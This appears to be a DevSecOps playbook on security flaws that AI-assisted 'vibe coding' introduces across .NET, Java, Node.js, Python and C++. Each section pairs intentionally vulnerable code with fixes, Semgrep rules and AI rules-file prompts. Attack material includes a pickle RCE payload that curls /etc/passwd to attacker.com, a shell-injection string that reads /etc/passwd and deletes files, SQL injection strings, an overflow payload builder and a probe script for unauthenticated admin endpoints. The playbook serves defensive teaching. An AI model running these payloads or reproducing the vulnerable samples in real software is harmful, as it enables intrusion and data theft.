WWW.DEVSECOPSGUIDES.COM
Vibe coding has transformed software development by democratizing programming through AI-assisted tools like GitHub Copilot, Cursor,
Windsurf, and Claude Code. However, this "forget that the code even exists" mentality has created a new category of systematically
vulnerable applications.
This playbook examines multi-technology attack scenarios where vibe coding misunderstandings create exploitable vulnerabilities across
.NET/ASP.NET Core, C/C++, Java/Spring, JavaScript, and Python ecosystems. We provide defensive strategies, AI assistant rules files,
and detection patterns to transform vibe coding from a security liability into a secure-by-default development accelerator.
| Aspect | Insecure Vibe Coding | Secure Vibe Coding |
| --- | --- | --- |
| Prompt Engineering | Generic requests without security context | Security-aware prompts with CWE references |
| Code Review Process | Auto-merge AI-generated code | Multi-stage validation with security scanning |
| Technology Integration | Isolated per-language development | Cross-stack security consistency |
| Validation Pipeline | Manual testing only | Automated SAST, SCA, and secret detection |
| Incident Response | Reactive patching per technology | Proactive multi-stack vulnerability management |
| Developer Training | AI tool proficiency only | Security-aware vibe coding practices |
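To make the prompt-engineering row concrete, the sketch below contrasts a generic request with a security-aware prompt that names the relevant CWEs; the wording is illustrative rather than taken from any particular tool.

```python
# Illustrative only: a generic prompt versus a security-aware prompt with CWE references.
GENERIC_PROMPT = "Write an ASP.NET Core controller that exports all users as JSON."

SECURITY_AWARE_PROMPT = (
    "Write an ASP.NET Core controller that exports all users as JSON. "
    "Require [Authorize(Roles = \"Administrator\")] on the controller, "
    "return only non-sensitive fields, and explicitly avoid CWE-306 "
    "(missing authentication for critical function) and CWE-359 "
    "(exposure of private information)."
)
```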
Attack Scenario: Vibe-coded controllers missing [Authorize] attributes expose administrative functions to unauthenticated users.
// AI-generated vulnerable controller - missing authorization
[ApiController]
[Route("api/[controller]")]
public class AdminController : ControllerBase
{
private readonly IUserService _userService;
public AdminController(IUserService userService)
{
_userService = userService;
}
// VULNERABILITY: No [Authorize] attribute
[HttpGet("users/export")]
public async Task<IActionResult> ExportAllUsers()
{
var users = await _userService.GetAllUsersWithSensitiveDataAsync();
return Ok(users); // Exposes PII to anyone
}
// VULNERABILITY: No role-based authorization
[HttpPost("users/{id}/promote")]
public async Task<IActionResult> PromoteToAdmin(int id)
{
await _userService.GrantAdminRoleAsync(id);
return Ok("User promoted to admin");
}
}
Visual Attack Flow:

1. Attacker → .NET API: GET /api/admin/users/export
2. .NET API: no [Authorize] check is performed
3. .NET API → Database: SELECT * FROM Users
4. Database → .NET API: all user PII data
5. .NET API → Attacker: sensitive data exposed
6. Attacker → .NET API: POST /api/admin/users/123/promote
7. .NET API: no role validation is performed
8. .NET API → Database: UPDATE Users SET Role='Admin'
9. Database → .NET API: role updated
10. .NET API → Attacker: "User promoted to admin"
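A minimal sketch of how an attacker might exercise this flow, assuming the API is reachable at a hypothetical https://target.example host; it simply issues the two unauthenticated requests shown above.

```python
# Hypothetical probe of the unauthenticated admin endpoints; host and IDs are illustrative.
import requests

BASE = "https://target.example"

# Step 1: attempt to export all users without any credentials.
export = requests.get(f"{BASE}/api/admin/users/export", timeout=10)
print(export.status_code, export.text[:200])

# Step 2: attempt privilege escalation against an arbitrary user id.
promote = requests.post(f"{BASE}/api/admin/users/123/promote", timeout=10)
print(promote.status_code, promote.text)
```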
// Security-aware AI-generated controller
[ApiController]
[Route("api/[controller]")]
[Authorize(Roles = "Administrator")] // Global authorization requirement
public class AdminController : ControllerBase
{
private readonly IUserService _userService;
private readonly IAuthorizationService _authorizationService;
public AdminController(IUserService userService, IAuthorizationService authorizationService)
{
_userService = userService;
_authorizationService = authorizationService;
}
[HttpGet("users/export")]
public async Task<IActionResult> ExportAllUsers()
{
// Additional authorization check for sensitive data
var authResult = await _authorizationService.AuthorizeAsync(User, "DataExportPolicy");
if (!authResult.Succeeded)
{
return Forbid("Insufficient privileges for data export");
}
var users = await _userService.GetUsersForExportAsync(); // Returns sanitized data
return Ok(users);
}
[HttpPost("users/{id}/promote")]
public async Task<IActionResult> PromoteToAdmin(int id)
{
// Verify super admin role for privilege escalation
if (!User.IsInRole("SuperAdministrator"))
{
return Forbid("Only super administrators can promote users");
}
await _userService.GrantAdminRoleAsync(id);
return Ok("User promoted with proper authorization");
}
}
Visual Defense Architecture:
rules:
- id: missing-authorize-attribute
pattern: |
[ApiController]
...
public class $CLASS : ControllerBase
{
...
[Http$METHOD("...")]
public ... $ACTION(...)
{
...
}
}
pattern-not: |
[Authorize]
...
[Http$METHOD("...")]
public ... $ACTION(...)
message: "Controller action missing [Authorize] attribute - potential unauthorized access"
severity: ERROR
languages: [csharp]
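One way to operationalize a rule like this is to run Semgrep in a pre-commit hook or CI job and fail the build on findings. A minimal sketch, assuming Semgrep is installed and the rule above is saved at a hypothetical rules/dotnet-authorization.yml path:

```python
# Minimal CI gate: run Semgrep with the custom rule and fail on findings.
# The rules path and source directory are assumptions; adjust to your repository layout.
import subprocess
import sys

result = subprocess.run(
    ["semgrep", "--config", "rules/dotnet-authorization.yml", "--error", "src/"],
    capture_output=True,
    text=True,
)
print(result.stdout)
if result.returncode != 0:
    print("Semgrep reported potential missing-authorization findings", file=sys.stderr)
    sys.exit(result.returncode)
```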
You are a security-focused .NET/ASP.NET Core developer. Generate code that:
- Always applies [Authorize] attributes to controllers unless explicitly documented with [AllowAnonymous]
- Uses IAuthorizationService for complex authorization logic
- Implements proper input validation using Data Annotations or FluentValidation
- Stores secrets in Azure Key Vault or user secrets during development
- Uses Entity Framework with parameterized queries, never string concatenation
- Includes comprehensive error handling without information disclosure
- Applies the principle of least privilege to all data access operations
Focus on OWASP ASVS Level 2 compliance for authentication and authorization controls.
Attack Scenario: AI-generated Spring Data JPA repositories using string concatenation in @Query annotations enable SQL injection attacks.
// AI-generated vulnerable repository
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// VULNERABILITY: String concatenation in @Query
@Query("SELECT u FROM User u WHERE u.username = '" + "#{username}" + "' AND u.status = 'ACTIVE'")
User findActiveUserByUsername(@Param("username") String username);
// VULNERABILITY: Dynamic query building
@Query("SELECT u FROM User u WHERE u.email LIKE '%" + "#{email}" + "%'")
List<User> findUsersByEmailPattern(@Param("email") String email);
// VULNERABILITY: No input validation
@Modifying
@Query("UPDATE User u SET u.role = '" + "#{role}" + "' WHERE u.id = #{userId}")
void updateUserRole(@Param("userId") Long userId, @Param("role") String role);
}
Visual Attack Flow:

1. Reconnaissance: identify injection point
2. Payload Crafting: username=' OR '1'='1
3. Exploitation: extract admin credentials
4. Privilege Escalation: access sensitive tables
5. Data Exfiltration: mission complete
// Security-aware Spring Data JPA repository
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// SECURE: Parameterized query with proper binding
@Query("SELECT u FROM User u WHERE u.username = :username AND u.status = 'ACTIVE'")
User findActiveUserByUsername(@Param("username") String username);
// SECURE: Using Spring Data method naming convention
List<User> findByEmailContainingAndStatusIs(String email, String status);
// SECURE: Parameterized update with validation
@Modifying
@Query("UPDATE User u SET u.role = :role WHERE u.id = :userId")
@Transactional
void updateUserRole(@Param("userId") Long userId, @Param("role") @Valid String role);
// SECURE: Custom method with validation
@Query("SELECT u FROM User u WHERE u.departmentId = :deptId ORDER BY u.createdAt DESC")
Page<User> findUsersByDepartment(@Param("deptId") Long departmentId, Pageable pageable);
}
Visual Defense Architecture:
rules:
- id: sql-injection-spring-query
pattern: |
@Query("... + $PARAM + ...")
message: "Potential SQL injection: avoid string concatenation in @Query annotations"
severity: ERROR
languages: [java]
fix: |
@Query("SELECT u FROM User u WHERE u.field = :paramName")
// Use :paramName instead of string concatenation
You are a security-aware Java/Spring Boot developer. Generate code that:
- Uses parameterized queries with :paramName syntax in @Query annotations
- Implements Bean Validation (@Valid, @NotNull) on all request DTOs
- Uses Spring Data JPA method naming conventions when possible
- Applies @PreAuthorize or @Secured annotations on service methods
- Configures proper CORS with specific origins, never wildcard
- Uses @Transactional with appropriate isolation levels
- Validates all user inputs before database operations
- Applies OWASP Java security best practices throughout
Never use string concatenation in database queries or dynamic query building.
Attack Scenario: AI-generated Node.js services using eval() or template literals in child_process.exec() enable command injection.
// AI-generated vulnerable service
const express = require('express');
const { exec } = require('child_process');
const app = express();
app.use(express.json());
// VULNERABILITY: Direct eval() usage
app.post('/api/calculate', (req, res) => {
const { expression } = req.body;
try {
// DANGEROUS: Direct evaluation of user input
const result = eval(expression);
res.json({ result });
} catch (error) {
res.status(400).json({ error: 'Invalid expression' });
}
});
// VULNERABILITY: Template literal in shell command
app.post('/api/process-file', (req, res) => {
const { filename, operation } = req.body;
// DANGEROUS: User input directly in shell command
exec(`${operation} /uploads/${filename}`, (error, stdout, stderr) => {
if (error) {
return res.status(500).json({ error: error.message });
}
res.json({ output: stdout });
});
});
// VULNERABILITY: Unsafe file operations
app.get('/api/read-config/:configName', (req, res) => {
const { configName } = req.params;
const fs = require('fs');
// DANGEROUS: Path traversal vulnerability
fs.readFile(`/config/${configName}.json`, 'utf8', (err, data) => {
if (err) {
return res.status(404).json({ error: 'Config not found' });
}
res.json(JSON.parse(data));
});
});
Visual Attack Flow: (sequence diagram not rendered in the source; it depicts the attacker sending a shell-injection payload such as `; cat /etc/passwd; rm ...` to the API, which passes it to the OS shell via exec())
// Security-aware Node.js service
const express = require('express');
const { spawn } = require('child_process');
const path = require('path');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const validator = require('validator');
const app = express();
// Security middleware
app.use(helmet());
app.use(express.json({ limit: '10mb' }));
// Rate limiting
const limiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100 // limit each IP to 100 requests per windowMs
});
app.use(limiter);
// SECURE: Mathematical expression evaluation without eval()
app.post('/api/calculate', (req, res) => {
const { expression } = req.body;
// Input validation
if (!expression || typeof expression !== 'string') {
return res.status(400).json({ error: 'Invalid expression format' });
}
// Whitelist mathematical operations only
const mathPattern = /^[0-9+\-*/.() ]+$/;
if (!mathPattern.test(expression)) {
return res.status(400).json({ error: 'Only mathematical operations allowed' });
}
try {
// Input is already restricted to the numeric whitelist above; a dedicated math parser (e.g., mathjs) is still preferable to the Function constructor
const func = new Function('return ' + expression);
const result = func();
res.json({ result });
} catch (error) {
res.status(400).json({ error: 'Invalid mathematical expression' });
}
});
// SECURE: Safe command execution with argument arrays
app.post('/api/process-file', (req, res) => {
const { filename, operation } = req.body;
// Input validation and sanitization
if (typeof filename !== 'string' || typeof operation !== 'string' ||
    !validator.isAlphanumeric(filename.replace(/[._-]/g, ''))) {
return res.status(400).json({ error: 'Invalid filename format' });
}
// Whitelist allowed operations
const allowedOperations = ['analyze', 'convert', 'validate'];
if (!allowedOperations.includes(operation)) {
return res.status(400).json({ error: 'Operation not allowed' });
}
// SAFE: Use spawn with argument array, not template literals
const child = spawn('file-processor', [operation, filename], {
cwd: '/safe-workspace',
timeout: 30000
});
let output = '';
child.stdout.on('data', (data) => {
output += data.toString();
});
child.on('close', (code) => {
if (code === 0) {
res.json({ output: output.trim() });
} else {
res.status(500).json({ error: 'Processing failed' });
}
});
});
// SECURE: Path traversal protection
app.get('/api/read-config/:configName', (req, res) => {
const { configName } = req.params;
// Input validation
if (!validator.isAlphanumeric(configName)) {
return res.status(400).json({ error: 'Invalid config name' });
}
// SAFE: Resolve path and validate it's within allowed directory
const configDir = '/app/config';
const configPath = path.join(configDir, `${configName}.json`);
const resolvedPath = path.resolve(configPath);
if (!resolvedPath.startsWith(path.resolve(configDir))) {
return res.status(403).json({ error: 'Access denied' });
}
const fs = require('fs').promises;
fs.readFile(resolvedPath, 'utf8')
.then(data => {
const config = JSON.parse(data);
res.json(config);
})
.catch(err => {
res.status(404).json({ error: 'Config not found' });
});
});
Visual Defense Architecture:
rules:
- id: command-injection-eval
pattern: eval($INPUT)
message: "Dangerous eval() usage - potential code injection"
severity: ERROR
languages: [javascript, typescript]
- id: command-injection-exec
pattern: |
exec(`...${$VAR}...`)
message: "Template literal in exec() - potential command injection"
severity: ERROR
languages: [javascript, typescript]
You are a security-conscious Node.js/Express developer. Generate code that:
- Uses child_process.spawn with argument arrays, never template literals in exec()
- Implements Helmet.js for security headers and proper CORS configuration
- Validates all user input with joi, express-validator, or validator.js
- Uses parameterized queries with prepared statements for database operations
- Applies rate limiting and request size limits
- Implements proper path traversal protection using path.resolve()
- Never uses eval() or Function() constructor with user input
- Includes comprehensive error handling without information disclosure
- Follows OWASP Node.js security best practices
Focus on preventing injection attacks and implementing defense in depth.
Attack Scenario: AI-generated Python applications using pickle.loads() on user-provided data enable remote code execution.
# AI-generated vulnerable Flask application
from flask import Flask, request, session, jsonify
import pickle
import base64
import os
app = Flask(__name__)
app.secret_key = 'hardcoded-secret-key' # VULNERABILITY: Hardcoded secret
@app.route('/api/save-preferences', methods=['POST'])
def save_preferences():
preferences = request.json.get('preferences')
# VULNERABILITY: Pickle serialization of user data
serialized = base64.b64encode(pickle.dumps(preferences))
session['user_prefs'] = serialized.decode()
return jsonify({'message': 'Preferences saved successfully'})
@app.route('/api/load-preferences', methods=['GET'])
def load_preferences():
serialized_prefs = session.get('user_prefs')
if not serialized_prefs:
return jsonify({'preferences': {}})
# VULNERABILITY: Pickle deserialization of user-controlled data
try:
decoded = base64.b64decode(serialized_prefs)
preferences = pickle.loads(decoded) # DANGEROUS!
return jsonify({'preferences': preferences})
except Exception as e:
return jsonify({'error': 'Failed to load preferences'}), 500
@app.route('/api/backup-data', methods=['POST'])
def backup_data():
backup_path = request.json.get('backup_path', '/tmp/backup.pkl')
# VULNERABILITY: Unsafe file path handling
user_data = get_user_data()
# DANGEROUS: User-controlled file path + pickle
with open(backup_path, 'wb') as f:
pickle.dump(user_data, f)
return jsonify({'message': f'Data backed up to {backup_path}'})
def get_user_data():
return {'users': ['admin', 'guest'], 'settings': {'debug': True}}
# Attacker's payload generation script
import pickle
import base64
import os
class MaliciousPayload:
def __reduce__(self):
# This will execute when unpickled
return (os.system, ('curl http://attacker.com/exfiltrate?data=$(cat /etc/passwd | base64)',))
# Generate malicious payload
payload = MaliciousPayload()
serialized = base64.b64encode(pickle.dumps(payload))
print(f"Malicious payload: {serialized.decode()}")
Visual Attack Flow:

1. Payload Generation: create malicious object with a crafted __reduce__ method
2. Serialization: pickle and Base64-encode the payload
3. Transmission: send to /api/save-preferences
4. Deserialization: pickle.loads() triggers __reduce__
5. Code Execution: os.system() runs the attacker's command
6. System Compromise: remote code execution complete
# Security-aware Flask application
from flask import Flask, request, session, jsonify
import json
import secrets
import os
from pathlib import Path
from marshmallow import Schema, fields, ValidationError
import jwt
from datetime import datetime, timedelta
app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY', secrets.token_hex(32))
# Input validation schemas
class PreferencesSchema(Schema):
theme = fields.Str(validate=lambda x: x in ['light', 'dark'])
language = fields.Str(validate=lambda x: x in ['en', 'es', 'fr', 'de'])
notifications = fields.Bool()
class BackupSchema(Schema):
backup_name = fields.Str(required=True, validate=lambda x: x.isalnum())
preferences_schema = PreferencesSchema()
backup_schema = BackupSchema()
@app.route('/api/save-preferences', methods=['POST'])
def save_preferences():
try:
# SECURE: JSON validation instead of pickle
preferences = preferences_schema.load(request.json.get('preferences', {}))
# SECURE: Use JWT for session data
token_data = {
'preferences': preferences,
'exp': datetime.utcnow() + timedelta(hours=24),
'iat': datetime.utcnow()
}
token = jwt.encode(token_data, app.secret_key, algorithm='HS256')
session['user_prefs_token'] = token
return jsonify({'message': 'Preferences saved securely'})
except ValidationError as e:
return jsonify({'error': 'Invalid preferences format', 'details': e.messages}), 400
@app.route('/api/load-preferences', methods=['GET'])
def load_preferences():
token = session.get('user_prefs_token')
if not token:
return jsonify({'preferences': {}})
try:
# SECURE: JWT verification and decoding
decoded = jwt.decode(token, app.secret_key, algorithms=['HS256'])
return jsonify({'preferences': decoded.get('preferences', {})})
except jwt.ExpiredSignatureError:
return jsonify({'error': 'Session expired'}), 401
except jwt.InvalidTokenError:
return jsonify({'error': 'Invalid session'}), 401
@app.route('/api/backup-data', methods=['POST'])
def backup_data():
try:
# SECURE: Input validation
validated_data = backup_schema.load(request.json)
backup_name = validated_data['backup_name']
# SECURE: Controlled backup directory
backup_dir = Path('/app/backups')
backup_dir.mkdir(exist_ok=True)
# SECURE: Construct safe file path
backup_file = backup_dir / f"{backup_name}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
# Ensure path is within allowed directory
if not str(backup_file.resolve()).startswith(str(backup_dir.resolve())):
return jsonify({'error': 'Invalid backup path'}), 400
user_data = get_user_data()
# SECURE: JSON serialization instead of pickle
with open(backup_file, 'w') as f:
json.dump(user_data, f, indent=2, default=str)
return jsonify({'message': f'Data backed up securely to {backup_file.name}'})
except ValidationError as e:
return jsonify({'error': 'Invalid backup request', 'details': e.messages}), 400
except Exception as e:
return jsonify({'error': 'Backup failed'}), 500
def get_user_data():
return {
'users': ['admin', 'guest'],
'settings': {'debug': False},
'timestamp': datetime.utcnow().isoformat()
}
Visual Defense Architecture:
rules:
- id: unsafe-pickle-loads
pattern: pickle.loads($DATA)
message: "Unsafe pickle.loads() - use JSON or safer serialization"
severity: ERROR
languages: [python]
- id: hardcoded-secret-key
pattern: |
secret_key = '$KEY'
message: "Hardcoded secret key detected - use environment variables"
severity: HIGH
languages: [python]
You are a security-focused Python developer. Generate code that:
- Uses JSON or JWT for data serialization, never pickle for user data
- Implements comprehensive input validation with marshmallow or pydantic schemas
- Uses secrets module for cryptographic operations and key generation
- Stores sensitive configuration in environment variables, never hardcoded
- Implements SQLAlchemy ORM with parameterized queries for database operations
- Uses Flask-Login or Django authentication decorators for access control
- Applies proper path validation to prevent directory traversal
- Includes comprehensive error handling without information disclosure
- Follows OWASP Python security guidelines
Never use pickle.loads(), eval(), or exec() with user-controlled data.
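As a compact illustration of two of these rules (environment-based secrets and parameter binding), a sketch using SQLAlchemy Core; the DATABASE_URL variable and users table layout are assumptions:

```python
# Sketch: environment-based secret handling plus a parameterized query.
# DATABASE_URL and the users table columns are illustrative assumptions.
import os
from sqlalchemy import create_engine, text

database_url = os.environ.get("DATABASE_URL")
if not database_url:
    raise RuntimeError("DATABASE_URL must be set; no insecure default is provided")

engine = create_engine(database_url)

def find_active_user(username: str):
    # Parameter binding (:username) keeps user input out of the SQL text.
    query = text("SELECT id, username FROM users WHERE username = :username AND is_active = true")
    with engine.connect() as conn:
        return conn.execute(query, {"username": username}).fetchone()
```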
Attack Scenario: AI-generated C/C++ code using unsafe string functions like strcpy(), gets(), and sprintf() enables buffer overflow attacks.
// AI-generated vulnerable C++ service
#include <iostream>
#include <cstring>
#include <cstdio>
#include <unistd.h>
class UserProcessor {
private:
char username[64];
char buffer[256];
bool isAdmin;
public:
UserProcessor() : isAdmin(false) {}
// VULNERABILITY: Unsafe strcpy without bounds checking
void setUsername(const char* name) {
strcpy(username, name); // DANGEROUS: No length validation
std::cout << "Username set to: " << username << std::endl;
}
// VULNERABILITY: gets() is inherently unsafe
void processUserInput() {
char input[128];
std::cout << "Enter command: ";
gets(input); // DANGEROUS: No bounds checking
executeCommand(input);
}
// VULNERABILITY: sprintf without bounds checking
void formatMessage(const char* template_str, const char* data) {
char formatted[256];
sprintf(formatted, template_str, data); // DANGEROUS: Format string vulnerability
std::cout << "Formatted: " << formatted << std::endl;
}
// VULNERABILITY: Manual memory management without validation
void processData(const char* data, int length) {
char* processing_buffer = new char[256];
// DANGEROUS: No length validation before copy
memcpy(processing_buffer, data, length);
// Process data...
std::cout << "Processing: " << processing_buffer << std::endl;
delete[] processing_buffer;
}
private:
void executeCommand(const char* cmd) {
if (isAdmin) {
system(cmd); // Additional vulnerability: command injection
} else {
std::cout << "Access denied" << std::endl;
}
}
};
// VULNERABILITY: Main function without input validation
int main() {
UserProcessor processor;
char name_buffer[1024]; // Large buffer to receive malicious input
std::cout << "Enter username: ";
std::cin.getline(name_buffer, sizeof(name_buffer));
processor.setUsername(name_buffer); // Overflow can occur here
processor.processUserInput();
return 0;
}
// Attacker's exploit development
#include <iostream>
#include <cstring>
int main() {
// Generate buffer overflow payload
char exploit_payload[1024];
// Fill buffer with pattern to overwrite adjacent memory
memset(exploit_payload, 'A', 64); // Fill username buffer
// Overwrite isAdmin boolean (adjacent in memory)
exploit_payload[64] = 1; // Set isAdmin = true
// Add shellcode or return address manipulation
strcpy(&exploit_payload[65], "\x90\x90\x90\x90"); // NOP sled
// Null terminate for string functions
exploit_payload[1023] = '\0';
std::cout << "Malicious payload generated: " << strlen(exploit_payload) << " bytes" << std::endl;
return 0;
}
Visual Attack Flow:

1. Attacker → C++ Application: send oversized username
2. C++ Application: strcpy() copies it without a bounds check
3. Memory Layout: buffer overflow occurs; adjacent variables are overwritten
4. Memory Layout: isAdmin flag corrupted
5. Attacker → C++ Application: send malicious command
6. C++ Application → Operating System: system() call with elevated privileges
7. Operating System: command executed with the application's privileges
// Security-aware C++ implementation
#include <iostream>
#include <string>
#include <memory>
#include <vector>
#include <algorithm>
#include <cstdio>
#include <unistd.h>
class SecureUserProcessor {
private:
std::string username; // SECURE: Use std::string instead of char arrays
bool isAdmin;
static const size_t MAX_USERNAME_LENGTH = 64;
static const size_t MAX_COMMAND_LENGTH = 256;
public:
SecureUserProcessor() : isAdmin(false) {}
// SECURE: Length validation and safe string operations
bool setUsername(const std::string& name) {
if (name.length() > MAX_USERNAME_LENGTH) {
std::cerr << "Username too long (max " << MAX_USERNAME_LENGTH << " characters)" << std::endl;
return false;
}
// SECURE: Input sanitization
std::string sanitized = sanitizeInput(name);
if (sanitized.empty()) {
std::cerr << "Username contains invalid characters" << std::endl;
return false;
}
username = sanitized;
std::cout << "Username safely set to: " << username << std::endl;
return true;
}
// SECURE: Safe input handling with bounds checking
bool processUserInput() {
std::string input;
std::cout << "Enter command (max " << MAX_COMMAND_LENGTH << " chars): ";
// SECURE: Use std::getline with length limit
if (!std::getline(std::cin, input) || input.length() > MAX_COMMAND_LENGTH) {
std::cerr << "Invalid input or command too long" << std::endl;
return false;
}
return executeCommand(input);
}
// SECURE: Safe string formatting with bounds checking
bool formatMessage(const std::string& template_str, const std::string& data) {
try {
// SECURE: Use C++ string formatting or snprintf for bounds checking
std::string formatted;
// Simple template replacement (in production, use a proper template engine)
formatted = template_str;
size_t pos = formatted.find("%s");
if (pos != std::string::npos) {
formatted.replace(pos, 2, data);
}
std::cout << "Safely formatted: " << formatted << std::endl;
return true;
} catch (const std::exception& e) {
std::cerr << "Formatting error: " << e.what() << std::endl;
return false;
}
}
// SECURE: RAII memory management with bounds checking
bool processData(const std::vector<char>& data) {
if (data.empty() || data.size() > 1024) { // Reasonable size limit
std::cerr << "Invalid data size" << std::endl;
return false;
}
// SECURE: Use smart pointers and containers
auto processing_buffer = std::make_unique<std::vector<char>>(data.size());
// SECURE: Safe copy with bounds checking
std::copy(data.begin(), data.end(), processing_buffer->begin());
std::cout << "Safely processing " << processing_buffer->size() << " bytes" << std::endl;
// Memory automatically cleaned up by smart pointer
return true;
}
private:
// SECURE: Input sanitization
std::string sanitizeInput(const std::string& input) {
std::string result;
for (char c : input) {
// Allow alphanumeric, spaces, and common safe punctuation
if (std::isalnum(c) || c == ' ' || c == '-' || c == '_' || c == '.') {
result += c;
}
}
return result;
}
// SECURE: Command validation instead of direct execution
bool executeCommand(const std::string& cmd) {
if (!isAdmin) {
std::cout << "Access denied - insufficient privileges" << std::endl;
return false;
}
// SECURE: Whitelist allowed commands
const std::vector<std::string> allowed_commands = {
"status", "help", "version", "info"
};
if (std::find(allowed_commands.begin(), allowed_commands.end(), cmd) == allowed_commands.end()) {
std::cout << "Command not allowed: " << cmd << std::endl;
return false;
}
std::cout << "Executing safe command: " << cmd << std::endl;
// Execute safe internal function instead of system()
handleSafeCommand(cmd);
return true;
}
void handleSafeCommand(const std::string& cmd) {
if (cmd == "status") {
std::cout << "System status: OK" << std::endl;
} else if (cmd == "help") {
std::cout << "Available commands: status, help, version, info" << std::endl;
} else if (cmd == "version") {
std::cout << "Version: 1.0.0-secure" << std::endl;
} else if (cmd == "info") {
std::cout << "User: " << username << ", Admin: " << (isAdmin ? "Yes" : "No") << std::endl;
}
}
};
// SECURE: Main function with proper error handling
int main() {
SecureUserProcessor processor;
std::cout << "Secure User Processor v1.0" << std::endl;
std::cout << "Enter username: ";
std::string username;
if (!std::getline(std::cin, username)) {
std::cerr << "Failed to read username" << std::endl;
return 1;
}
if (!processor.setUsername(username)) {
std::cerr << "Failed to set username" << std::endl;
return 1;
}
if (!processor.processUserInput()) {
std::cerr << "Failed to process user input" << std::endl;
return 1;
}
return 0;
}
Visual Defense Architecture:

1. User input → length check (reject if too long)
2. Character validation (sanitize or reject invalid characters)
3. Buffer allocation
4. Safe copy operation
5. Process data
6. Automatic cleanup via RAII
rules:
- id: unsafe-string-functions
patterns:
- pattern: strcpy($DEST, $SRC)
- pattern: gets($BUF)
- pattern: sprintf($BUF, ...)
message: "Unsafe string function - use safe alternatives"
severity: ERROR
languages: [c, cpp]
fix: |
// Use safe alternatives:
strncpy_s(dest, dest_size, src, _TRUNCATE); // Instead of strcpy
fgets(buffer, sizeof(buffer), stdin); // Instead of gets
snprintf(buffer, sizeof(buffer), fmt, ...); // Instead of sprintf
You are a security-focused C/C++ systems developer. Generate code that:
- Uses safe string functions: strncpy_s instead of strcpy, snprintf instead of sprintf
- Never uses gets(), strcpy(), or sprintf() - always use bounded alternatives
- Implements RAII patterns with smart pointers (std::unique_ptr, std::shared_ptr)
- Uses std::string and std::vector instead of raw char arrays when possible
- Performs bounds checking on all buffer operations and memory allocations
- Enables compiler security flags: -fstack-protector-strong, -D_FORTIFY_SOURCE=2
- Implements comprehensive input validation and sanitization
- Uses static_cast instead of C-style casts for type safety
- Includes proper error handling and resource cleanup
- Applies defense-in-depth principles with multiple validation layers
Follow modern C++ best practices for memory safety and OWASP C++ guidelines.
To prevent vibe coding vulnerabilities across all technology stacks, we provide comprehensive rules files for major AI coding assistants. Each
rules file incorporates OWASP security principles, CWE-based vulnerability prevention, and technology-specific secure coding practices.
All AI assistant rules files include this foundational security guidance:
# Universal Security Baseline for AI Code Generation
## Core Security Principles
- **Defense in Depth**: Implement multiple layers of security controls
- **Principle of Least Privilege**: Grant minimal necessary permissions
- **Secure by Default**: Choose secure configurations over convenient ones
- **Input Validation**: Validate all user input at system boundaries
- **Error Handling**: Prevent information disclosure through error messages
## Critical CWE Prevention
- **CWE-89**: SQL Injection - Use parameterized queries and ORM frameworks
- **CWE-78**: OS Command Injection - Use safe command execution patterns
- **CWE-306**: Missing Authentication - Apply authentication to all sensitive operations
- **CWE-502**: Unsafe Deserialization - Use JSON/JWT instead of native serialization
- **CWE-120**: Buffer Overflow - Use memory-safe languages and bounds checking
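As a brief Python illustration of two items from this list — CWE-89 via parameter binding and CWE-78 via argument-array command execution — the following sketch uses only the standard library; the table name and external command are illustrative assumptions:

```python
# Illustrative CWE-89 / CWE-78 mitigations; table name and external command are assumptions.
import sqlite3
import subprocess

def get_user(conn: sqlite3.Connection, username: str):
    # CWE-89: bound parameter instead of string formatting.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchone()

def identify_upload(path: str) -> str:
    # CWE-78: argument list with no shell, so the path is never interpreted by a shell.
    result = subprocess.run(
        ["file", "--brief", path], capture_output=True, text=True, check=True
    )
    return result.stdout.strip()
```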
# Cursor Security Rules for Multi-Stack Development
## Language-Agnostic Security Requirements
- Always validate and sanitize user input before processing
- Use parameterized queries for database operations across all languages
- Implement proper authentication and authorization checks
- Never hardcode secrets, credentials, or API keys in source code
- Apply the principle of least privilege to all access controls
## .NET/ASP.NET Core Specific Rules
- Apply [Authorize] attributes to all controller actions unless explicitly [AllowAnonymous]
- Use IConfiguration for secrets management, never hardcoded values
- Implement proper model validation with Data Annotations or FluentValidation
- Use Entity Framework with LINQ expressions, never raw SQL concatenation
- Enable HTTPS redirection and security headers in production
## Java/Spring Specific Rules
- Use @PreAuthorize or @Secured annotations on sensitive service methods
- Implement Bean Validation (@Valid, @NotNull) on all request DTOs
- Use Spring Data JPA with :paramName syntax in @Query annotations
- Configure CORS with specific origins, never use wildcard (*)
- Apply @Transactional with appropriate isolation levels
## JavaScript/Node.js Specific Rules
- Use child_process.spawn with argument arrays, never template literals in exec()
- Implement Helmet.js for security headers and proper CORS configuration
- Validate input with joi, express-validator, or similar validation libraries
- Use prepared statements for database queries, never string concatenation
- Apply rate limiting and request size limits to all endpoints
## Python Specific Rules
- Use JSON or JWT for session data, never pickle for user-controlled data
- Implement comprehensive input validation with marshmallow or pydantic
- Use SQLAlchemy ORM with parameter binding, never raw SQL formatting
- Store secrets in environment variables with python-dotenv or similar
- Apply Flask-Login or Django authentication decorators to protected views
## C/C++ Specific Rules
- Use safe string functions: strncpy_s, snprintf instead of strcpy, sprintf
- Implement RAII patterns with smart pointers (unique_ptr, shared_ptr)
- Perform bounds checking on all buffer operations and memory allocations
- Use std::string and std::vector instead of raw char arrays when possible
- Enable compiler security flags: -fstack-protector-strong, -D_FORTIFY_SOURCE=2
# Cline Security Configuration for Multi-Technology Projects
## Security-First Development Approach
You are a security-aware developer who prioritizes secure coding practices across all technology stacks. Apply defense-
in-depth principles and follow OWASP guidelines for all generated code.
## Cross-Technology Security Patterns
### Input Validation
- **All Languages**: Validate input length, type, format, and range before processing
- **Web Applications**: Sanitize HTML input to prevent XSS attacks
- **APIs**: Validate request payloads against strict schemas
- **Database**: Use parameterized queries or ORM frameworks exclusively
### Authentication & Authorization
- **.NET**: Implement [Authorize] attributes and policy-based authorization
- **Java**: Use Spring Security with @PreAuthorize annotations
- **Node.js**: Implement JWT-based authentication with proper validation
- **Python**: Use Flask-Login/Django auth with session protection
- **C++**: Implement secure authentication protocols with validated inputs
### Secure Data Handling
- **Serialization**: Use JSON, XML, or Protocol Buffers - never native serialization for user data
- **Secrets Management**: Store in environment variables, key vaults, or secure configuration
